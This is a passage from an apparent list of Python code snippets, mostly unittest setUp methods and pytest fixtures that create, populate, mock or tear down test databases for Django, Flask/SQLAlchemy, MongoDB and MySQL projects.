self.populate_db() # Your function that adds test data.", "def stub_blueprint_populate_autouse(stub_blueprint_populate: None) -> None:", "def stub_blueprint_populate_autouse(stub_blueprint_populate: None) -> None:", "def setUp(self):\n self.database = Mock()", "def monkeypatch_connections(self):\n \n def create_test_db(self, verbosity=1, autoclobber=False):\n \"\"\"\n Creates a test database, prompting the user for confirmation if the\n database already exists. Returns the name of the test database created.\n \"\"\"\n # Don't import django.core.management if it isn't needed.\n test_database_name = self._get_test_db_name()\n \n if self.connection.settings_dict.get('ENGINE', '').endswith('.sqlite3')\\\n and test_database_name != ':memory:':\n if os.access(test_database_name, os.F_OK):\n print \"sqlite test database found !\"\n \n #self._create_test_db(verbosity, autoclobber)\n \n self.connection.close()\n self.connection.settings_dict[\"NAME\"] = test_database_name\n \n # Confirm the feature set of the test database\n self.connection.features.confirm()\n \n # Get a cursor (even though we don't need one yet). This has\n # the side effect of initializing the test database.\n self.connection.cursor()\n\n return test_database_name\n \n def destroy_test_db(self, old_database_name, verbosity=1):\n \"\"\"\n Destroy a test database, prompting the user for confirmation if the\n database already exists.\n \"\"\"\n self.connection.close()\n test_database_name = self.connection.settings_dict['NAME']\n if verbosity >= 1:\n test_db_repr = ''\n if verbosity >= 2:\n test_db_repr = \" ('%s')\" % test_database_name\n print \"Ignore the test database for alias '%s'%s...\" % (\n self.connection.alias, test_db_repr)\n \n # Temporarily use a new connection and a copy of the settings dict.\n # This prevents the production database from being exposed to potential\n # child threads while (or after) the test database is destroyed.\n # Refs #10868 and #17786.\n settings_dict = self.connection.settings_dict.copy()\n settings_dict['NAME'] = old_database_name \n \n def _destroy_test_db(self, test_database_name, verbosity):\n print \"Keep the test database !\" #%test_database_name\n self.connection.close()\n \n \n for alias in connections:\n \"\"\"\n django.test.simple.DjangoTestSuiteRunner\n django.db.backends.creation\n django.db.backends.mysql.base\n \"\"\"\n connection = connections[alias]\n #if connection.settings_dict.get('ENGINE', '').endswith('.sqlite3'):\n \n if not self.options['setupdbs']:\n f1 = types.MethodType(create_test_db, connection.creation, DatabaseCreation)\n connection.creation.create_test_db = f1\n \n if not self.options['teardowndbs']:\n f2 = types.MethodType(destroy_test_db, connection.creation, DatabaseCreation)\n connection.creation.destroy_test_db = f2", "def db_path_with_improper_files():\n return os.path.join(_here, 'fixtures/databases/db-improper/database')", "def fixture_sequence_ctx(sequence_db: Manager) -> Dict[str, Manager]:\n return {\"db\": sequence_db}", "def db_type(pytestconfig, request):\n if pytestconfig.getoption(\"--mongodb\"):\n pytest.skip(\"ephemeraldb tests disabled\")\n yield \"ephemeraldb\"", "def patch_driver(db, monkeypatch):\n monkeypatch.setattr(\n \"fence.scripting.fence_create.get_SQLAlchemyDriver\", lambda _: db\n )", "def pytest_configure():\n exec(open(\"script/generate_sql\").read())", "def setUp(self):\n\n fq_dataset_name = self.fq_table_names[0].split('.')\n self.fq_dataset_name = '.'.join(fq_dataset_name[:-1])\n\n fq_sandbox_name = self.fq_sandbox_table_names[0].split('.')\n self.fq_sandbox_name = '.'.join(fq_sandbox_name[:-1])\n\n super().setUp()", "def app_factory(monkeypatch):\n\n created_app_envs = []\n\n def _app_factory():\n\n # create a temporary file to isolate the database for each test\n\n LOG.info(\"Creating test app ... \")\n\n # create the app with common test config\n db_fd, db_path = tempfile.mkstemp()\n tmp_work_dir = tempfile.TemporaryDirectory(\n prefix='pytest-bio3dbeacon-')\n\n config = bio3dbeacon.config.TestingConfig()\n config.WORK_DIR = tmp_work_dir.name\n\n # for the duration of this test, always return this app on 'create_app'\n original_create_app = bio3dbeacon.app.create_app\n _app = original_create_app(config=config)\n\n def mock_create_app(*args, **kwargs):\n LOG.warning('Using mocked create_app')\n return _app\n\n LOG.info(\"Applying monkeypatch for create_app ...\")\n monkeypatch.setattr(bio3dbeacon.app, 'create_app', mock_create_app)\n\n LOG.debug(\"APP: db_path = %s\", db_path)\n\n _app.config['SQLALCHEMY_DATABASE_URI'] = f'sqlite:///{db_path}'\n\n # create the database and load test data\n with _app.app_context():\n LOG.debug(\"Initialising test database ... \")\n bio3dbeacon.database.init_db()\n # get_db().executescript(_data_sql)\n\n created_app_envs.append({\n 'app': _app,\n 'db_fd': db_fd,\n 'db_path': db_path,\n 'work_dir': tmp_work_dir,\n })\n\n return _app\n\n yield _app_factory\n\n for app_env in created_app_envs:\n LOG.info(\"Cleaning up test app ...\")\n # close and remove the temporary database\n os.close(app_env['db_fd'])\n os.unlink(app_env['db_path'])\n app_env['work_dir'].cleanup()", "def populate_fixtures():\n languages()\n words()", "def _fixture(\n self,\n dialect_name,\n exception,\n db_stays_down,\n is_disconnect=True,\n ):\n connect_args = {}\n patchers = []\n db_disconnected = False\n\n class DisconnectCursorMixin:\n def execute(self, *arg, **kw):\n if db_disconnected:\n raise exception\n else:\n return super().execute(*arg, **kw)\n\n if dialect_name == \"postgresql\":\n import psycopg2.extensions\n\n class Curs(DisconnectCursorMixin, psycopg2.extensions.cursor):\n pass\n\n connect_args = {\"cursor_factory\": Curs}\n\n elif dialect_name == \"mysql\":\n import pymysql\n\n def fake_ping(self, *arg, **kw):\n if db_disconnected:\n raise exception\n else:\n return True\n\n class Curs(DisconnectCursorMixin, pymysql.cursors.Cursor):\n pass\n\n connect_args = {\"cursorclass\": Curs}\n\n patchers.append(\n mock.patch.object(\n pymysql.Connection, \"ping\", fake_ping\n )\n )\n else:\n raise NotImplementedError()\n\n with mock.patch.object(\n compat,\n \"native_pre_ping_event_support\",\n self.native_pre_ping,\n ):\n engine = engines.create_engine(\n self.engine.url, max_retries=0)\n\n # 1. override how we connect. if we want the DB to be down\n # for the moment, but recover, reset db_disconnected after\n # connect is called. If we want the DB to stay down, then\n # make sure connect raises the error also.\n @event.listens_for(engine, \"do_connect\")\n def _connect(dialect, connrec, cargs, cparams):\n nonlocal db_disconnected\n\n # while we're here, add our cursor classes to the DBAPI\n # connect args\n cparams.update(connect_args)\n\n if db_disconnected:\n if db_stays_down:\n raise exception\n else:\n db_disconnected = False\n\n # 2. initialize the dialect with a first connect\n conn = engine.connect()\n conn.close()\n\n # 3. add additional patchers\n patchers.extend([\n mock.patch.object(\n engine.dialect.dbapi,\n \"Error\",\n self.Error,\n ),\n mock.patch.object(\n engine.dialect,\n \"is_disconnect\",\n mock.Mock(return_value=is_disconnect),\n ),\n ])\n\n with test_utils.nested(*patchers):\n # \"disconnect\" the DB\n db_disconnected = True\n yield engine", "def test_twice_dependent_object_import(self):\n pass", "def setUp(self):\n self.data = DatabaseIntermediary()", "def setUp(self):\n init_db()\n self.client = Client(schema)", "def setUp(self):\n self.fixtures_path = os.path.join(\n os.path.dirname(os.path.abspath(__file__)), \"fixtures/\"\n )", "def setUp(self):\n self.app = create_app()\n self.client = self.app.test_client\n self.database_name = \"trivia_test\"\n #self.database_path = \"postgres://{}/{}\".format('localhost:5432', self.database_name)\n self.database_path = 'postgresql+psycopg2://{}:{}@{}/{}'.format('postgres','picasso0', 'localhost:5432', self.database_name)\n setup_db(self.app, self.database_path)\n\n # binds the app to the current context\n with self.app.app_context():\n self.db = SQLAlchemy()\n self.db.init_app(self.app)\n # create all tables\n self.db.create_all()", "def setUp(self):\n super().setUp()\n self.direct_dependency = \"laravel-mix@4.0.16\"\n self.direct_dependency_key = Entity.safe_entity_key(self.direct_dependency)\n self.direct_dependency_path = [\"package.json@*\", self.direct_dependency]\n self.vulnerabilities_json = {\n \"vulnerabilities\": [\n {\n \"id\": \"SNYK-JS-ACORN-559469\",\n \"severity\": \"low\",\n \"from\": [*self.direct_dependency_path, \"webpack@4.41.4\", \"acorn@6.4.0\"],\n },\n ],\n }\n self.expected_entity = {\n \"key\": self.direct_dependency_key,\n \"dependency\": self.direct_dependency,\n \"nr_vulnerabilities\": 1,\n \"example_vulnerability\": \"SNYK-JS-ACORN-559469\",\n \"url\": \"https://snyk.io/vuln/SNYK-JS-ACORN-559469\",\n \"example_path\": \"package.json@* ➜ laravel-mix@4.0.16 ➜ webpack@4.41.4 ➜ acorn@6.4.0\",\n \"highest_severity\": \"low\",\n }", "def electrolytedb():\n if not check_for_mongodb():\n pytest.skip(\"MongoDB is required\")", "def setUp(self):\n self.test_data = MockPyMySqlDataSource().load()", "def fixtures():\n temp_path = os.path.join(os.path.dirname(__file__), 'temp')\n demo_files_path = os.path.join(os.path.dirname(__file__), 'demo_files')\n\n # Create location\n loc = Location(name='local', uri=temp_path, default=True)\n db.session.add(loc)\n db.session.commit()\n\n # Example files from the data folder\n demo_files = (\n 'markdown.md',\n 'csvfile.csv',\n 'zipfile.zip',\n 'jsonfile.json',\n 'xmlfile.xml',\n 'notebook.ipynb',\n 'jpgfile.jpg',\n 'pngfile.png',\n )\n\n rec_uuid = uuid4()\n provider = RecordIdProvider.create(object_type='rec', object_uuid=rec_uuid)\n data = {\n 'pid_value': provider.pid.pid_value,\n }\n\n record = Record.create(data, id_=rec_uuid)\n bucket = Bucket.create()\n RecordsBuckets.create(record=record.model, bucket=bucket)\n\n # Add files to the record\n for f in demo_files:\n with open(os.path.join(demo_files_path, f), 'rb') as fp:\n record.files[f] = fp\n\n record.files.flush()\n record.commit()\n db.session.commit()", "def setUp(self):\n self.app = api.app\n self.client = self.app.test_client\n \n setup_db(self.app)\n\n # binds the app to the current context\n with self.app.app_context():\n self.db = SQLAlchemy()\n self.db.init_app(self.app)", "async def test_dependent_fixture(dependent_fixture):\n await asyncio.sleep(0.1)", "def setUp(self):\n super().setUp()\n Tenant.objects.get_or_create(schema_name=\"public\")", "def test_setup_applies_patches(self):\n manager_inits = self.get_manager_inits()\n persistence_helper = PersistenceHelper()\n self.assertEqual(persistence_helper._patches_applied, False)\n self.assertEqual(manager_inits, self.get_manager_inits())\n\n self.assertEqual(persistence_helper.setup(), None)\n self.assertEqual(persistence_helper._patches_applied, True)\n self.assertNotEqual(manager_inits, self.get_manager_inits())\n\n # Clean up after ourselves.\n persistence_helper._unpatch()\n self.assertEqual(persistence_helper._patches_applied, False)\n self.assertEqual(manager_inits, self.get_manager_inits())", "def setUpTestData(cls):\n call_command('loaddata', 'db.json', verbosity=0)", "def mongo_fixture(scope='function', versions=['latest'], data=None,\n restore=None, reuse=True, replicaset=None, port=27017,\n client_args=None):\n\n # parallelized start of different versions\n if reuse:\n for version in versions:\n ensure_service(version, replicaset, port, client_args)\n\n @pytest.fixture(scope=scope, params=versions)\n def mongo(request):\n if reuse:\n service = get_service(request.param)\n else:\n service = dockerdb.service.Mongo(request.param, wait=True,\n replicaset=replicaset,\n exposed_port=port,\n client_args=client_args)\n\n client = service.pymongo_client()\n service.wait()\n\n if data:\n insert_data(client, data)\n\n if restore:\n mongorestore(service, restore)\n\n yield service\n\n if not reuse:\n service.remove()\n\n return mongo", "def setUp(self):\n super().setUp()\n self.database.datamodels.find_one.return_value = self.DATA_MODEL", "def test_blogpost_belongs_to_app(self):\r\n self.configure_fixtures()\r\n blogpost = Blogpost(title='title', body=\"body\", app=None)", "def setup_fixtures(func):\n func = pytest.mark.usefixtures('smtp', 'mock_access_request', 'dummy_access_request')(func)\n func = pytest.mark.parametrize('mock_access_request',\n [{\n 'during_registration': True,\n 'during_registration_required': True,\n 'personal_data': PERSONAL_DATA\n }],\n indirect=True)(func)\n return func", "def setup_fixtures(func):\n func = pytest.mark.usefixtures('smtp', 'mock_access_request', 'dummy_access_request')(func)\n func = pytest.mark.parametrize('mock_access_request',\n [{\n 'during_registration': True,\n 'during_registration_required': True,\n 'personal_data': PERSONAL_DATA\n }],\n indirect=True)(func)\n return func", "def pytest_fixture_setup(fixturedef):\n if isasyncgenfunction(fixturedef.func):\n func = fixturedef.func\n\n strip_request = False\n if 'request' not in fixturedef.argnames:\n fixturedef.argnames += ('request',)\n strip_request = True\n\n def wrapper(*args, **kwargs):\n request = kwargs['request']\n\n if strip_request:\n del kwargs['request']\n\n if 'loop' not in request.fixturenames:\n raise Exception(\n \"Asynchronous fixtures must depend on the 'loop' fixture or \"\n \"be used in tests depending from it.\"\n )\n\n loop = request.getfixturevalue('loop')\n # for async generators, we need to advance the generator once,\n # then advance it again in a finalizer\n gen = func(*args, **kwargs)\n\n def finalizer():\n try:\n return loop.run_until_complete(gen.__anext__())\n except StopAsyncIteration: # NOQA\n pass\n\n request.addfinalizer(finalizer)\n return loop.run_until_complete(gen.__anext__())\n\n fixturedef.func = wrapper\n\n elif asyncio.iscoroutinefunction(fixturedef.func):\n func = fixturedef.func\n\n strip_request = False\n if 'request' not in fixturedef.argnames:\n fixturedef.argnames += ('request',)\n strip_request = True\n\n def wrapper(*args, **kwargs):\n request = kwargs['request']\n if 'loop' not in request.fixturenames:\n raise Exception(\n \"Asynchronous fixtures must depend on the 'loop' fixture or \"\n \"be used in tests depending from it.\"\n )\n\n loop = request.getfixturevalue('loop')\n\n if strip_request:\n del kwargs['request']\n\n return loop.run_until_complete(func(*args, **kwargs))\n\n fixturedef.func = wrapper\n\n else:\n return", "def setUpTestData(cls):\n cls.emulate_off_api_manager_categories()\n cls.emulate_off_api_manager_products()\n cls.db_manager = Command()", "def setUp(self):\n test_helpers.patch_environ(self)\n\n data = []\n\n strategy1 = data_types.FuzzStrategyProbability()\n strategy1.strategy_name = 'fork,corpus_subset,'\n strategy1.probability = 0.33\n strategy1.engine = 'libFuzzer'\n data.append(strategy1)\n\n strategy2 = data_types.FuzzStrategyProbability()\n strategy2.strategy_name = 'random_max_len,value_profile,'\n strategy2.probability = 0.34\n strategy2.engine = 'libFuzzer'\n data.append(strategy2)\n ndb.put_multi(data)\n\n distribution = fuzz_task.get_strategy_distribution_from_ndb()\n\n environment.set_value('USE_BANDIT_STRATEGY_SELECTION', True)\n environment.set_value('STRATEGY_SELECTION_DISTRIBUTION', distribution)", "def test_golden_path_sql_datasource_configuration(\n mock_emit,\n caplog,\n empty_data_context_stats_enabled,\n sa,\n test_connectable_postgresql_db,\n):\n context: DataContext = empty_data_context_stats_enabled\n\n with set_directory(context.root_directory):\n # Everything below this line (except for asserts) is what we expect users to run as part of the golden path.\n import great_expectations as gx\n\n context = gx.get_context()\n\n db_hostname = os.getenv(\"GE_TEST_LOCAL_DB_HOSTNAME\", \"localhost\")\n yaml_config = f\"\"\"\n class_name: SimpleSqlalchemyDatasource\n credentials:\n drivername: postgresql\n username: postgres\n password: \"\"\n host: {db_hostname}\n port: 5432\n database: test_ci\n\n introspection:\n whole_table_with_limits:\n sampling_method: _sample_using_limit\n sampling_kwargs:\n n: 10\n \"\"\"\n # noinspection PyUnusedLocal\n report_object = context.test_yaml_config(\n name=\"my_datasource\",\n yaml_config=yaml_config,\n return_mode=\"report_object\",\n )\n assert mock_emit.call_count == 2\n # Substitute anonymized names since it changes for each run\n anonymized_datasource_name = mock_emit.call_args_list[1][0][0][\"event_payload\"][\n \"anonymized_name\"\n ]\n anonymized_data_connector_name = mock_emit.call_args_list[1][0][0][\n \"event_payload\"\n ][\"anonymized_data_connectors\"][0][\"anonymized_name\"]\n expected_call_args_list = [\n mock.call(\n {\"event_payload\": {}, \"event\": \"data_context.__init__\", \"success\": True}\n ),\n mock.call(\n {\n \"event\": \"data_context.test_yaml_config\",\n \"event_payload\": {\n \"anonymized_name\": anonymized_datasource_name,\n \"parent_class\": \"SimpleSqlalchemyDatasource\",\n \"anonymized_execution_engine\": {\n \"parent_class\": \"SqlAlchemyExecutionEngine\"\n },\n \"anonymized_data_connectors\": [\n {\n \"anonymized_name\": anonymized_data_connector_name,\n \"parent_class\": \"InferredAssetSqlDataConnector\",\n }\n ],\n },\n \"success\": True,\n }\n ),\n ]\n assert mock_emit.call_args_list == expected_call_args_list\n\n print(json.dumps(report_object, indent=2))\n print(context.datasources)\n\n context.get_batch_list(\n \"my_datasource\",\n \"whole_table_with_limits\",\n \"test_df\",\n )\n # assert len(my_batch.data.fetchall()) == 10\n\n with pytest.raises(KeyError):\n context.get_batch_list(\n \"my_datasource\",\n \"whole_table_with_limits\",\n \"DOES_NOT_EXIST\",\n )\n\n my_validator = context.get_validator(\n datasource_name=\"my_datasource\",\n data_connector_name=\"whole_table_with_limits\",\n data_asset_name=\"test_df\",\n expectation_suite=ExpectationSuite(\n \"my_expectation_suite\", data_context=context\n ),\n )\n my_evr = my_validator.expect_table_columns_to_match_set(column_set=[])\n print(my_evr)\n\n # my_evr = my_validator.expect_column_values_to_be_between(\n # column=\"x\",\n # min_value=0,\n # max_value=4,\n # )\n # assert my_evr.success\n\n # TODO: <Alex>ALEX</Alex>\n # my_evr = my_validator.expect_table_columns_to_match_ordered_list(ordered_list=[\"a\", \"b\", \"c\"])\n # assert my_evr.success\n\n # Confirm that logs do not contain any exceptions or invalid messages\n assert not usage_stats_exceptions_exist(messages=caplog.messages)\n assert not usage_stats_invalid_messages_exist(messages=caplog.messages)", "def test_reload_if_needed(self):\n self.db.storage = MagicMock()\n self.db.storage.list.return_value = [make_package(factory=SQLPackage)]\n self.db.reload_if_needed()\n count = self.sql.query(SQLPackage).count()\n self.assertEqual(count, 1)", "def setUp(self):\n db.create_all()", "def test_pytest_passes(cookies, context_override):\n result = cookies.bake(extra_context=context_override)\n project_path = str(result.project_path)\n current_dir = os.getcwd()\n try:\n new_env = os.environ.copy()\n if context_override[\"use_database\"] == \"Yes\" and not new_env.get(\"SQLALCHEMY_DATABASE_URI\"):\n new_env[\"SQLALCHEMY_DATABASE_URI\"] = \"postgresql://postgres:mysecretpassword@localhost:5432/postgres\"\n os.chdir(project_path)\n subprocess.run(\"python3 -m venv venv_tmp \"\n \"&& source ./venv_tmp/bin/activate \"\n \"&& make test && \", shell=True, env=new_env)\n except Exception as e:\n pytest.fail(str(e))\n finally:\n os.chdir(current_dir)\n shutil.rmtree(project_path)", "def setUp(self):\n test_helpers.patch_environ(self)\n\n data = []\n\n strategy1 = data_types.FuzzStrategyProbability()\n strategy1.strategy_name = 'corpus_subset,'\n strategy1.probability = 0.33\n strategy1.engine = 'afl'\n data.append(strategy1)\n\n strategy2 = data_types.FuzzStrategyProbability()\n strategy2.strategy_name = 'corpus_mutations_radamsa,corpus_subset,'\n strategy2.probability = 0.34\n strategy2.engine = 'afl'\n data.append(strategy2)\n\n strategy3 = data_types.FuzzStrategyProbability()\n strategy3.strategy_name = 'corpus_subset,'\n strategy3.probability = 0.33\n strategy3.engine = 'afl'\n data.append(strategy3)\n ndb.put_multi(data)\n\n distribution = fuzz_task.get_strategy_distribution_from_ndb()\n\n environment.set_value('USE_BANDIT_STRATEGY_SELECTION', True)\n environment.set_value('STRATEGY_SELECTION_DISTRIBUTION', distribution)", "def setUp(self):\n\n app.config.from_object(config['testing'])\n db.create_all()", "def setUp(self):\n self.db_fd, app.app.config['DATABASE'] = tempfile.mkstemp()\n app.app.config['TESTING'] = True\n self.app = app.app.test_client()\n app.init_db()", "def setUp(self):\n self.app = app.test_client()\n db.init_db()", "def test_sync_incorrect_user_yaml_file(syncer, monkeypatch, db_session):\n path = os.path.join(\n os.path.dirname(os.path.realpath(__file__)), \"data/yaml/incorrect_user.yaml\"\n )\n monkeypatch.setattr(syncer, \"sync_from_local_yaml_file\", path)\n with pytest.raises(AssertionError):\n syncer.sync()\n assert syncer.arborist_client.create_resource.not_called()\n assert syncer.arborist_client.create_role.not_called()\n assert syncer.arborist_client.create_policy.not_called()", "def load_fixtures(self, dbname, table, data):\n db = self.databases[dbname]['db']\n db.execute('BEGIN')\n for row in data:\n columns = row.keys()\n q = db.Insert(table, cols=columns)\n db.execute(q, row)\n db.execute('COMMIT')", "def setUpClass(cls):\n super(AttachmentTest, cls).setUpClass()\n django.setup()", "def _pre_setup(self):\r\n\r\n # Flush the Mongo modulestore\r\n ModuleStoreTestCase.drop_mongo_collections()\r\n\r\n # Call superclass implementation\r\n super(ModuleStoreTestCase, self)._pre_setup()", "def test_fixtures(self):\n\n self.assertEqual(OrderType.objects.count(), 2,\n 'Incorrect order type count')\n self.assertEqual(Stock.objects.count(), 3,\n 'Incorrect stocks count')\n self.assertEqual(OrderStatus.objects.count(), 3,\n 'Incorrect statuses count')", "def initialize_test_env():\n async def do():\n c = Config()\n pool = await aiomysql.create_pool(\n host=c[\"DB_HOST\"],\n port=c[\"DB_PORT\"],\n user=c[\"DB_USERNAME\"],\n password=c[\"DB_PASSWORD\"],\n db=c[\"TEST_DB_NAME\"],\n cursorclass=aiomysql.DictCursor\n )\n async with pool.acquire() as conn:\n async with conn.cursor() as cur:\n await cur.execute(\n \"SELECT table_name AS n FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA = %s\", (c[\"TEST_DB_NAME\"],)\n )\n tables = await cur.fetchall()\n await cur.execute(\"SET FOREIGN_KEY_CHECKS = 0\")\n for table in tables:\n await cur.execute(\"DROP TABLE {}\".format(table[\"n\"],))\n await cur.execute(\"SET FOREIGN_KEY_CHECKS = 1\")\n await conn.commit()\n\n await Migrator(pool).migrate()\n\n with open(\"./tests/additional.sql\", \"r\") as f:\n queries = f.read()\n\n async with pool.acquire() as conn:\n async with conn.cursor() as cur:\n await cur.execute(queries)\n await conn.commit()\n\n asyncio.get_event_loop().run_until_complete(do())", "def test_config():\n\n # assert create_app().testing\n assert create_app(\"testing\", settings={\n \"TESTING\": True,\n \"SQLALCHEMY_TRACK_MODIFICATIONS\": False\n }).testing", "def pytest_collection_modifyitems(config, items):\n execute_mssql_tests = ensure_mssql_ready_for_tests(config)\n skip_mssql = pytest.mark.skip(reason=\"requires SQL Server\")\n for item in items:\n if \"mssql\" in item.keywords:\n if execute_mssql_tests:\n # Add 'mssql_setup_and_teardown' as FIRST in fixture list\n fixtures = ['mssql_setup_and_teardown'] + item.fixturenames\n item.fixturenames = fixtures\n else:\n item.add_marker(skip_mssql)\n if \"http_server\" in item.keywords:\n item.fixturenames.append('http_server_setup_and_teardown')", "def test_db(app):\n assert app.config['DATABASE'] == 'sqlite:///:memory:'", "def setUp(self):\n self.app = create_app()\n self.client = self.app.test_client\n self.database_name = \"databasename\"\n self.database_path = \"postgresql://postgres:usman@{}/{}\".format('localhost:5432', self.database_name)\n setup_db(self.app, self.database_path)\n\n # binds the app to the current context\n with self.app.app_context():\n self.db = SQLAlchemy()\n self.db.init_app(self.app)\n # create all tables\n self.db.create_all()", "def setup(self, db: UnitTestDB) -> None:\n # Use type(self) instead of self as a workaround to @classmethod decorator (unsupported by pytest and\n # required when scope is set to \"class\" <https://github.com/pytest-dev/pytest/issues/3778>)\n type(self).dbc = db.dbc", "def setUp(self):\n super(SiteDBTest, self).setUp()\n self.mySiteDB = SiteDBJSON()", "def setUp(self):\n\n # Get the Flask test client.\n self.client = app.test_client()\n app.config[\"TESTING\"] = True\n app.config[\"SQLALCHEMY_TRACK_MODIFICATIONS\"] = False\n\n # Connect to the test database.\n connect_to_db(app, db_uri=\"postgresql:///testnourish\") \n\n # Create the tables and add the sample data.\n db.create_all()\n load_test_data()", "def test_dummydb_basic(self):\n db = DummyDB()", "def setUp(self):\n self.database = Mock()\n self.database.reports_overviews.find_one.return_value = dict(_id=\"id\")", "def setUp(self):\n db.drop_all() # clean up the last tests\n db.create_all() # make our sqlalchemy tables", "def setUp(self):\n super(TranscriptionsTest, self).setUp()\n mommy.make_recipe('grunt.seed', _quantity=2)", "def setUp(self):\n self.app = create_app()\n self.client = self.app.test_client\n self.database_name = \"trivia_test\"\n # self.database_path = \"postgres://{}/{}\".format('localhost:5432', self.database_name)\n self.database_path = \"postgres://postgres:admin@{}/{}\".format(\n 'localhost:5432', self.database_name)\n setup_db(self.app, self.database_path)\n\n # binds the app to the current context\n with self.app.app_context():\n self.db = SQLAlchemy()\n self.db.init_app(self.app)\n # create all tables\n self.db.create_all()", "def setUp(self) -> None:\n from zero.services import things\n self.things = things\n app = mock.MagicMock(\n config={\n # 'SQLALCHEMY_DATABASE_URI': 'mysql://bob:dole@localhost/ack',\n 'SQLALCHEMY_DATABASE_URI': 'sqlite:///:memory:',\n 'SQLALCHEMY_TRACK_MODIFICATIONS': False\n }, extensions={}, root_path=''\n )\n self.things.db.init_app(app) # type: ignore\n self.things.db.app = app # type: ignore\n self.things.db.create_all() # type: ignore\n\n self.data = dict(name='The first thing', created=datetime.now())\n self.dbthing = self.things.DBThing(**self.data) # type: ignore\n self.things.db.session.add(self.dbthing) # type: ignore\n self.things.db.session.commit() # type: ignore", "def setUp(self) -> None:\n from zero.services import things\n self.things = things\n app = mock.MagicMock(\n config={\n # 'SQLALCHEMY_DATABASE_URI': 'mysql://bob:dole@localhost/ack',\n 'SQLALCHEMY_DATABASE_URI': 'sqlite:///:memory:',\n 'SQLALCHEMY_TRACK_MODIFICATIONS': False\n }, extensions={}, root_path=''\n )\n self.things.db.init_app(app) # type: ignore\n self.things.db.app = app # type: ignore\n self.things.db.create_all() # type: ignore\n\n self.data = dict(name='The first thing', created=datetime.now())\n self.dbthing = self.things.DBThing(**self.data) # type: ignore\n self.things.db.session.add(self.dbthing) # type: ignore\n self.things.db.session.commit() # type: ignore", "def setUp(self) -> None:\n from zero.services import things\n self.things = things\n app = mock.MagicMock(\n config={\n # 'SQLALCHEMY_DATABASE_URI': 'mysql://bob:dole@localhost/ack',\n 'SQLALCHEMY_DATABASE_URI': 'sqlite:///:memory:',\n 'SQLALCHEMY_TRACK_MODIFICATIONS': False\n }, extensions={}, root_path=''\n )\n things.db.init_app(app)\n things.db.app = app\n things.db.create_all()\n\n self.data = dict(name='The first thing', created=datetime.now())\n self.dbthing = self.things.DBThing(**self.data) # type: ignore\n self.things.db.session.add(self.dbthing) # type: ignore\n self.things.db.session.commit() # type: ignore", "def fixture_snp_ctx(snp_db: Manager) -> Dict[str, Manager]:\n return {\"db\": snp_db}", "def autofixDependencies(self, global_ctx):\n pass", "def setup():\n load_app()\n setup_db()", "def setUp(self):\n self.app = create_app(\"configmodule.TestingConfig\")\n self.app.testing = True\n\n self.client = self.app.test_client()\n\n with self.app.app_context():\n db.drop_all()\n db.create_all()", "def before_test(self, func, *args, **kwargs):\n pass", "def create_test_db(self, *args, **kw):\n self.destroy_test_db()\n self.connection.use_test_datastore = True\n self.connection.flush()", "def setUp(self):\n self.a = backend.dbconnection.DBConnect()", "def setUp(self):\n self.setUpPyfakefs()", "def setUp(self):\n self.app = create_app()\n self.client = self.app.test_client\n self.database_name = \"trivia\"\n self.database_path = \"postgres://{}/{}\".format('localhost:5432', self.database_name)\n self.database_path = \"postgres://{}:{}@{}/{}\".format('postgres', 'postgres', 'localhost:5432', self.database_name)\n setup_db(self.app, self.database_path)\n\n # binds the app to the current context\n with self.app.app_context():\n self.db = SQLAlchemy()\n self.db.init_app(self.app)\n # create all tables\n self.db.create_all()", "def setup_class(cls):\n super(TestUpgradeNonVendorDependencies, cls).setup_class()\n cls.scaffold_item(\"protocol\", \"my_protocol\", skip_consistency_check=True)\n cls.scaffold_item(\"connection\", \"my_connection\", skip_consistency_check=True)\n cls.scaffold_item(\"contract\", \"my_contract\", skip_consistency_check=True)\n cls.scaffold_item(\"skill\", \"my_skill\", skip_consistency_check=True)\n cls.run_cli_command(\n \"--skip-consistency-check\",\n \"add\",\n \"skill\",\n str(cls.old_error_skill_id),\n cwd=cls._get_cwd(),\n )\n cls.run_cli_command(\n \"--skip-consistency-check\", \"upgrade\", \"--local\", cwd=cls._get_cwd()\n )", "def setUp(self):\n INFLUX_DB_NAME = 'test_device_parameters'\n EmptyDBTestCase.client.create_database(INFLUX_DB_NAME)\n EmptyDBTestCase.client.drop_database(INFLUX_DB_NAME)\n EmptyDBTestCase.client.create_database(INFLUX_DB_NAME)", "def test_dependencies(self):\n process_parent = Process.objects.filter(slug=\"test-dependency-parent\").latest()\n process_child = Process.objects.filter(slug=\"test-dependency-child\").latest()\n data_parent = Data.objects.create(\n name=\"Test parent\", contributor=self.contributor, process=process_parent\n )\n data_child1 = Data.objects.create(\n name=\"Test child\",\n contributor=self.contributor,\n process=process_child,\n input={},\n )\n data_child2 = Data.objects.create(\n name=\"Test child\",\n contributor=self.contributor,\n process=process_child,\n input={\"parent\": data_parent.pk},\n )\n data_child3 = Data.objects.create(\n name=\"Test child\",\n contributor=self.contributor,\n process=process_child,\n input={\"parent\": None},\n )\n\n data_parent.refresh_from_db()\n data_child1.refresh_from_db()\n data_child2.refresh_from_db()\n data_child3.refresh_from_db()\n\n # Check locks are created in manager.\n self.assertFalse(data_parent.access_logs.exists())\n self.assertFalse(data_child1.access_logs.exists())\n self.assertTrue(data_child2.access_logs.exists())\n self.assertFalse(data_child3.access_logs.exists())\n\n # Check that the data_parent location was locked.\n access_log = data_child2.access_logs.get()\n self.assertEqual(\n access_log.storage_location.file_storage.data.get().id, data_parent.id\n )\n # Check that the log is released.\n self.assertIsNotNone(access_log.started)\n self.assertIsNotNone(access_log.finished)\n\n # Check status.\n self.assertEqual(data_parent.status, Data.STATUS_DONE)\n self.assertEqual(data_child1.status, Data.STATUS_DONE)\n self.assertEqual(data_child2.status, Data.STATUS_DONE)\n self.assertEqual(data_child3.status, Data.STATUS_DONE)", "def setUp(self):\n self.db_fd, closet.app.config['DATABASE'] = tempfile.mkstemp()\n closet.app.config['TESTING'] = True\n self.app = closet.app.test_client()\n closet.init_db()", "def setUp(self):\n tested_app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///test.db'\n db.init_app(tested_app)\n with tested_app.app_context():\n db.create_all()\n db.session.commit()", "def before_run_tests(cls):\n pass", "def setUp(self):\n self.app = create_app()\n self.client = self.app.test_client\n self.database_name = \"Casting_Agency_test\"\n self.database_path = \"postgres://hala@{}/{}\".format('localhost:5432', self.database_name)\n setup_db(self.app, self.database_path)\n\n # binds the app to the current context\n with self.app.app_context():\n self.db = SQLAlchemy()\n self.db.init_app(self.app)\n # create all tables\n self.db.create_all()" ]
